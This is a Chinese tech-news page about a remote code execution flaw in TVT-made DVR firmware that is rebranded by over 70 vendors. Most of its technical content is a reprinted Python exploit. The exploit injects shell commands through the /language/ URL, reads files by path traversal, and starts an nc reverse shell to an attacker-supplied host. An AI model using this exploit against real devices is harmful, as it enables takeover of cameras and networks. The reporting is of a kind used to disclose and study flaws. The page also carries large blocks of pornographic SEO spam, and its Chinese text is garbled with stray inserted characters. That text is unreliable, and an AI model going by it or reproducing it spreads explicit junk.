精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

黑掉70多款監(jiān)控攝像頭?so easy!

安全 終端安全
近日,一位安全研究員發(fā)現(xiàn)70多個供應(yīng)商售賣的監(jiān)控攝像頭很容易受到遠(yuǎn)程代碼執(zhí)行(RCE)攻擊。

近日,一位安全研究員發(fā)現(xiàn)70多個供應(yīng)商售賣的監(jiān)控攝像頭很容易受到遠(yuǎn)程代碼執(zhí)行(RCE)攻擊。

根據(jù)安全研究員Rotem Kemer研究發(fā)現(xiàn),超過70個供應(yīng)商售賣的監(jiān)控攝像頭都很容喲受到遠(yuǎn)程代碼執(zhí)行(RCE)攻擊。

[[164830]]

研究人員注意到供應(yīng)商正在售賣的商品使用的是同樣的、易受到RCE攻擊的固件。

在“白色標(biāo)簽”的經(jīng)營模式下,各種各樣的供應(yīng)商只是簡單地將自己的標(biāo)簽貼在相同的產(chǎn)品上進(jìn)行售賣,但是不幸的是,他們都沒有開發(fā)軟件硬件的資格。

這個脆弱的固件是由一家中國制造商TVT開發(fā)的,Kerner分析之后發(fā)現(xiàn)了閉路電視系統(tǒng)的DVR盒易于攻擊的原因。

使用這種固件的產(chǎn)品是在一家銷售閉路電視系統(tǒng)的以色列公司購買的,其代碼也表明了這是一個脆弱的HTTP服務(wù)器。

安全漏洞依賴于服務(wù)器來檢查是否存在給定語言的目錄。如果該文件夾不存在,軟件會通過提取遠(yuǎn)程命令來執(zhí)行打開口令。

下面是研究人員的解釋:

它會讀取URL,如果URL包含以下的內(nèi)容/language/[language]/index.html 。

如果該目錄存在的話,就會提取斜杠之間的【language】內(nèi)容并且進(jìn)行檢查;如果不存在,就會直接執(zhí)行此命令

tar –zxf /mnt/mtd/WebSites/language.tar.gz [language]/* -C /nfsdir/language

這基本上就是給了我們一個遠(yuǎn)程命令執(zhí)行的機(jī)會。

下面是影響固件漏洞的概念證明代碼:

  1. #!/usr/bin/python  
  2. # http://www.kerneronsec.com/2016/02/remote-code-execution-in-cctv-dvrs-of.html  
  3. __author__ = 'Rotem Kerner' 
  4. from sys import argv  
  5. import optparse  
  6. from urlparse import urlparse  
  7. from re import compile  
  8. import socket  
  9. import requests  
  10. from requests.exceptions import ConnectionError, Timeout, ContentDecodingError  
  11. from socket import timeout  
  12. def main():  
  13.     # parse command line options and atguments  
  14.     optparseoptparser = optparse.OptionParser(usage="%s <target-url> [options]" % argv[0])  
  15.     optparser.add_option('-c','--check',action="store_true",dest="checkvuln"default=False,  
  16.                          help="Check if target is vulnerable")  
  17.     optparser.add_option('-e','--exploit', action="store"type="string"dest="connback",  
  18.                          help="Fire the exploit against the given target URL")  
  19.     (options, args) = optparser.parse_args()  
  20.     try:  
  21.         target = args[0]  
  22.     except IndexError:  
  23.         optparser.print_help()  
  24.         exit()  
  25.     target_url = urlparse(target)  
  26.     # validating hostname  
  27.     if not target_url.hostname:  
  28.         print "[X] supplied target "%s" is not a valid URL" % target  
  29.         optparser.print_help()  
  30.         exit()  
  31.     # A little hack to handle read timeouts, since urllib2 doesnt give us this functionality.  
  32.     socket.setdefaulttimeout(10)  
  33.     # is -c flag on check if target url is vulnrable.  
  34.     if options.checkvuln is True:  
  35.         print "[!] Checking if target "%s" is vulnable..." % target_url.netloc  
  36.         try:  
  37.             # Write file  
  38.             raw_url_request('%s://%s/language/Swedish${IFS}&&echo${IFS}1>test&&tar${IFS}/string.js'  
  39.                          % (target_url.scheme, target_url.netloc))  
  40.             # Read the file.  
  41.             response = raw_url_request('%s:/%s/../../../../../../../mnt/mtd/test' % (target_url.scheme, target_url.netloc))  
  42.             # remove it..  
  43.             raw_url_request('%s://%s/language/Swedish${IFS}&&rm${IFS}test&&tar${IFS}/string.js'  
  44.                          % (target_url.scheme, target_url.netloc))  
  45.         except (ConnectionError, Timeout, timeout) as e:  
  46.             print "[X] Unable to connect. reason: %s.  exiting..." % e.message  
  47.             return  
  48.         if response.text[0] != '1':   
  49.             print "[X] Expected response content first char to be '1' got %s. exiting..." % response.text  
  50.             return  
  51.         print "[V] Target "%s" is vulnerable!" % target_url.netloc  
  52.     # if -e is on then fire exploit,  
  53.     if options.connback is not None:  
  54.         # Validate connect-back information.  
  55.         pattern = compile('(?P<host>[a-zA-Z0-9.-]+):(?P<port>[0-9]+)')  
  56.         match = pattern.search(options.connback)  
  57.         if not match:  
  58.             print "[X] given connect back "%s" should be in the format for host:port" % options.connback  
  59.             optparser.print_help()  
  60.             exit()  
  61.         # fire remote code execution!  
  62.         # Three ..  
  63.         try:  
  64.             raw_url_request('%s://%s/language/Swedish${IFS}&&echo${IFS}nc${IFS}%s${IFS}%s${IFS}>e&&${IFS}/a'  
  65.                         % (target_url.scheme, target_url.netloc, match.group('host'), match.group('port')))  
  66.         # Two ...  
  67.             raw_url_request('%s://%s/language/Swedish${IFS}&&echo${IFS}"-e${IFS}$SHELL${IFS}">>e&&${IFS}/a'  
  68.                          % (target_url.scheme, target_url.netloc))  
  69.         # One. Left off!  
  70.             raw_url_request('%s://%s/language/Swedish&&$(cat${IFS}e)${IFS}&>r&&${IFS}/s'  
  71.                          % (target_url.scheme, target_url.netloc))  
  72.         except (ConnectionError, Timeout, timeout) as e:  
  73.             print "[X] Unable to connect reason: %s.  exiting..." % e.message  
  74.         print "[V] Exploit payload sent!, if nothing went wrong we should be getting a reversed remote shell at %s:%s"   
  75.               % (match.group('host'), match.group('port'))  
  76. # Disabling URL encode hack  
  77. def raw_url_request(url):  
  78.     r = requests.Request('GET')  
  79.     r.url = url  
  80.     rr = r.prepare()  
  81.     # set url without encoding  
  82.     r.url = url  
  83.     s = requests.Session()  
  84.     return s.send(r)  
  85. if __name__ == '__main__':  
  86.     main() 

他注意到目前來說有數(shù)以萬計的產(chǎn)品在使用這種HTTP服務(wù)器。他是在查詢了Shodan搜索引擎之后做出的這樣的肯定判斷,而沒在這種搜索引擎中的產(chǎn)品可能數(shù)量更多。

研究者說,“快速查詢Shodan之后發(fā)現(xiàn)其分布超過三萬;這已經(jīng)很多了,但是我相信這還只是一小部分。”

Kerner試圖向最初的制造商TVT報告這個問題,但是沒有受到任何回復(fù)。

責(zé)任編輯:藍(lán)雨淚 來源: FreeBuf
相關(guān)推薦

2021-03-11 10:21:55

特斯拉黑客網(wǎng)絡(luò)攻擊

2009-10-22 09:00:10

Windows 7攝像工具

2014-07-16 13:36:30

MotionLinux監(jiān)控

2019-12-26 12:30:54

攝像頭漏洞攻擊

2013-03-21 09:56:09

2011-04-25 09:16:10

Windows 8

2012-06-23 20:13:44

HTML5

2017-06-20 11:45:52

2024-11-29 16:51:18

2021-08-10 10:59:17

APP攝像頭黑產(chǎn)

2009-08-21 17:24:18

C#控制攝像頭

2009-06-17 11:52:01

Linux

2011-09-08 13:53:20

Linux攝像頭

2023-11-06 12:57:03

2012-06-05 11:59:25

2015-05-11 10:16:20

2021-07-30 16:22:52

攝像頭漏洞CamOver

2018-06-20 11:54:54

2011-09-13 15:51:11

PhoneGap AP

2020-06-04 10:59:10

JavaScript開發(fā)技術(shù)
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號

91精品国产综合久| 国产肉体xxxx裸体784大胆| av免费在线网站| 不卡的av中国片| 国产精品成人av在线| 黄视频网站免费看| 夜夜春成人影院| 欧美高清一级片在线| www国产精品内射老熟女| 在线免费看黄网站| 99精品桃花视频在线观看| 国产日产久久高清欧美一区| 国产精品1000| 亚洲草久电影| 亚洲人成自拍网站| 日本少妇一级片| 成人精品动漫| 欧美性jizz18性欧美| 91视频成人免费| 国产h视频在线观看| 国产a视频精品免费观看| 日本国产高清不卡| 香蕉视频一区二区| 欧美在线看片| 最新的欧美黄色| 中文字幕一区二区三区人妻| 日韩第一区第二区| 欧美午夜不卡视频| 日韩精品视频久久| 岛国毛片av在线| 亚洲人一二三区| 色婷婷精品国产一区二区三区| 欧美视频久久久| 国产精品一区二区黑丝| 国产日韩换脸av一区在线观看| 五月婷婷视频在线| 日韩一区二区免费看| 九九久久精品一区| 欧美日韩中文字幕在线观看| 久久精品国产99久久| 亚洲欧美在线看| 成人h动漫精品一区| 高清日韩中文字幕| 日韩女优av电影在线观看| 久久久久久久高清| 91嫩草国产线观看亚洲一区二区 | 成人av在线观| 国产精品永久入口久久久| 99产精品成人啪免费网站| 六月丁香综合在线视频| 国产成人精品一区二区三区| 日韩在线视频不卡| 久久久久久久尹人综合网亚洲| 国内精品久久久久影院优| 国产小视频在线观看免费| 好看的日韩av电影| 久久久久久香蕉网| 日韩黄色a级片| 免费久久99精品国产自在现线| 午夜精品一区二区三区在线| 日韩精品久久久久久久酒店| 亚洲麻豆视频| 日韩美女视频免费看| 97人妻一区二区精品视频| 日韩av二区在线播放| 国产精品色视频| 国产美女精品视频国产| 国产精品亚洲视频| 国产免费一区二区| 欧美日本网站| 日韩一区日韩二区| 国产一级不卡视频| 日韩欧美一中文字暮专区| 色8久久精品久久久久久蜜| 一区二区在线播放视频| 亚洲精品自拍| 亚洲第一页在线| 波多野结衣a v在线| 精品久久一区| 欧美成人免费在线视频| 日本熟妇成熟毛茸茸| 媚黑女一区二区| 国产综合色香蕉精品| 性欧美videos另类hd| 久久一留热品黄| youjizz.com亚洲| 国产理论电影在线| 色偷偷久久人人79超碰人人澡| 一级片视频免费观看| 亚洲大奶少妇| 国产亚洲欧美另类中文| 欧美又粗又大又长| 肉丝袜脚交视频一区二区| 91在线视频成人| 日本大臀精品| 亚洲黄色av一区| 50路60路老熟妇啪啪| 日本免费精品| 一区二区福利视频| 精品无码黑人又粗又大又长| 蜜臀av一区二区| 国产乱码精品一区二区三区卡| 国产一二三在线观看| 亚洲激情五月婷婷| 超碰在线公开97| 欧美精品中文字幕亚洲专区| 精品国产自在精品国产浪潮| 国产精品suv一区二区三区| 狠狠色狠狠色综合系列| 欧美一区二区高清在线观看| 色操视频在线| 777亚洲妇女| 欧美做受高潮6| 亚洲黄色在线| 91黄在线观看| 久久99精品久久久久久野外| 色乱码一区二区三区88| 无码国产69精品久久久久网站 | 91麻豆天美传媒在线| 色成人免费网站| 日韩成人av在线| 久久久久久久久久久久久久免费看 | 欧美激情视频免费看| 欧美网站免费| 亚洲美女视频网| 日韩av无码中文字幕| 国产福利一区二区三区视频| 伊人久久大香线蕉综合75| 成人影院大全| 亚洲欧美日韩中文在线| www成人在线| av一二三不卡影片| av在线免费观看国产| 精品视频一区二区三区| 日韩小视频在线| 亚洲天堂avav| 国产精品免费看片| 久久精品影视大全| 波多野结衣的一区二区三区| 国产不卡精品视男人的天堂| 日韩精品视频无播放器在线看 | 97福利一区二区| 刘亦菲久久免费一区二区| 一区二区在线观看视频在线观看| 最新免费av网址| 91日韩免费| 91免费视频国产| 在线视频观看国产| 日韩欧美aaaaaa| 久久精品国产亚洲av麻豆色欲| 丰满岳乱妇一区二区三区| 亚洲精品久久久久久久蜜桃臀| 成人精品动漫一区二区三区| 久久久亚洲欧洲日产国码aⅴ| 亚洲成人av综合| 午夜激情久久久| 性欧美成人播放77777| 久久字幕精品一区| 亚洲精品久久区二区三区蜜桃臀| 外国成人毛片| 欧美国产日韩二区| 日本又骚又刺激的视频在线观看| 日韩欧美一区二区三区| 亚洲一级片在线播放| 久久国产日韩欧美精品| 青青草视频国产| 久久动漫网址| 国产精品极品美女在线观看免费| 日本不卡不卡| 精品不卡在线视频| 久久青青草原亚洲av无码麻豆| 国产三级欧美三级日产三级99| 亚洲免费黄色网| 亚洲性人人天天夜夜摸| 久久精品日韩精品| 久久天堂影院| 久久人人爽人人爽人人片av高请 | 国产精品嫩草影院com| 四川一级毛毛片| 久久蜜桃精品| 色乱码一区二区三区熟女| 国产成人澳门| 国产精品欧美一区二区三区奶水| 最爽无遮挡行房视频在线| 亚洲国内精品在线| 日本妇乱大交xxxxx| 一区二区三区免费看视频| 亚洲成人日韩在线| 精品一区二区三区蜜桃| 国产素人在线观看| 欧美wwwww| 久久资源亚洲| 免费精品一区| 国产精品九九久久久久久久| 啪啪免费视频一区| 伊人精品在线观看| 男人天堂av网| 欧美日韩mp4| 久久久久久久久久久久久久av| 中文字幕制服丝袜一区二区三区 | 天天操天天插天天射| 欧美日韩国产高清一区| 日韩免费黄色片| 亚洲欧洲精品成人久久奇米网| 噜噜噜在线视频| 国产一区二区不卡在线| 日本va中文字幕| 国产农村妇女精品一二区| 992tv成人免费观看| 精品视频免费| 裸模一区二区三区免费| 亚洲经典视频| 亚洲999一在线观看www| 播放一区二区| 国产成人精品日本亚洲| 国产自产自拍视频在线观看| 欧美国产精品va在线观看| 婷婷五月在线视频| 在线国产精品视频| 日本一级在线观看| 亚洲国产成人精品女人久久久| 国产精品亚洲欧美在线播放| 欧美日韩一区不卡| 国产精品久久久久久人| 精品毛片网大全| 久久精品久久精品久久| 亚洲精品久久久久久国产精华液| 欧美a在线播放| 国产女同性恋一区二区| 日韩人妻一区二区三区| 91啦中文在线观看| 欧美大片免费播放器| 成人精品国产福利| 中国黄色片视频| www.欧美精品一二区| 国产伦精品一区二区三区精品| 国产 日韩 欧美大片| 又色又爽又黄18网站| 成人综合婷婷国产精品久久蜜臀 | 亚洲第一成人av| 欧美一二三四区在线| 国产精品欧美综合亚洲| 欧美夫妻性生活| 国产男女无套免费网站| 91精品国产乱码久久蜜臀| 国产精品无码天天爽视频| 欧美高清视频在线高清观看mv色露露十八 | 黄色亚洲精品| 国产在线播放观看| 国产精品美女久久久| 色诱视频在线观看| 秋霞国产午夜精品免费视频| 欧美成人三级在线播放| 激情另类小说区图片区视频区| 涩多多在线观看| 粉嫩av亚洲一区二区图片| 午夜福利三级理论电影| 99久久99久久免费精品蜜臀| 人妻熟女aⅴ一区二区三区汇编| 国产亚洲一区字幕| 欧美巨胸大乳hitomi| 亚洲视频在线观看一区| 久久久久久久久97| 婷婷久久综合九色国产成人| 69视频免费在线观看| 欧美影视一区在线| 99国产精品久久久久久久成人| 日韩免费高清视频| 午夜一区在线观看| 在线视频欧美性高潮| av免费在线网站| 97色在线视频观看| 日韩一区精品| 99在线热播| 免费av一区二区三区四区| 永久域名在线精品| 亚洲婷婷免费| 日本成人中文字幕在线| 国产精品亚洲第一区在线暖暖韩国| 在线黄色免费网站| 国产精品久久久久婷婷二区次| 国产探花在线免费观看| 精品高清美女精品国产区| 中日韩av在线| 亚洲成人精品久久久| aaa在线观看| 亚洲**2019国产| 外国成人毛片| 欧美一级片免费观看| 91成人国产| 欧洲熟妇精品视频| 丰满放荡岳乱妇91ww| 中文字幕第二区| 精品福利在线视频| 国产乱码久久久久| 亚洲欧美中文日韩在线| 日本在线视频网址| 国产精品视频一区二区高潮| 国产欧美三级电影| 2021狠狠干| 美女性感视频久久| 亚洲黄色在线网站| 亚洲一二三四在线| 国产精品伊人久久| 国产亚洲在线播放| sm性调教片在线观看| 亚洲一区美女视频在线观看免费| 欧美猛男男男激情videos| 国产一区二区三区乱码| 久久精品国产亚洲aⅴ| 欧美多人猛交狂配| 亚洲午夜成aⅴ人片| 一区二区三区精彩视频| 亚洲人成网站999久久久综合| 免费不卡av| 亚洲999一在线观看www| 98精品视频| 日本激情视频在线播放| 久久青草欧美一区二区三区| 精品无码人妻一区二区三区品| 欧美高清精品3d| 日本中文字幕在线视频| 国产精品aaa| 国产成人精品一区二区免费看京 | 伊伊综合在线| 极品尤物一区二区三区| 欧美三区在线| www.欧美com| 一区二区在线看| 精品人妻少妇AV无码专区| 久久视频免费观看| 四虎精品在线观看| 亚洲欧美综合一区| 奇米影视一区二区三区| 亚洲国产日韩一区无码精品久久久| 日韩欧美国产成人| 日韩欧美在线番号| 日本欧美精品在线| 免费不卡中文字幕在线| 免费观看成人网| 国产丝袜在线精品| 在线观看国产小视频| 中日韩午夜理伦电影免费| julia一区二区三区中文字幕| 日韩欧美一区二区三区四区| 日韩专区在线视频| 九九热免费在线| 欧美日韩国产免费| 超碰电影在线播放| 成人国产一区二区| 亚洲免费高清| 免费毛片视频网站| 欧美日韩视频在线观看一区二区三区 | 免费黄色日本网站| 久久久久久久网| 136福利视频导航| 久久视频国产精品免费视频在线| 日韩精品中文字幕吗一区二区| av一区二区三区免费观看| 成人毛片老司机大片| 69国产精品视频免费观看| 伊人伊成久久人综合网站| 亚州欧美在线| www.av毛片| 久久久99精品免费观看不卡| 少妇无套内谢久久久久| 久久久国产91| 国产精品对白久久久久粗| 国产欧美高清在线| 国产精品久久久久久久久免费桃花| 国产乱色精品成人免费视频| 欧美激情在线有限公司| 亚洲精品亚洲人成在线观看| 在线观看国产中文字幕| 亚洲狠狠爱一区二区三区| 丝袜视频国产在线播放| 国产精品香蕉在线观看| 欧美日韩国产免费观看 | 国产在视频线精品视频www666| 五月天婷婷亚洲| 香蕉成人啪国产精品视频综合网| 青春草在线观看| 51国偷自产一区二区三区的来源| 中国女人久久久| 精品国产视频在线观看| 亚洲精品大尺度| 91嫩草国产线观看亚洲一区二区| 91免费黄视频| 亚洲婷婷综合久久一本伊一区| 日韩一区二区三区不卡| 国产精品视频999| 亚洲黄色三级| 精品国产视频在线观看| 亚洲人成网站色ww在线| 91成人噜噜噜在线播放| 污污动漫在线观看| 狠狠躁天天躁日日躁欧美| av网站免费在线观看| 日韩av一区二区三区美女毛片| 高清在线成人网|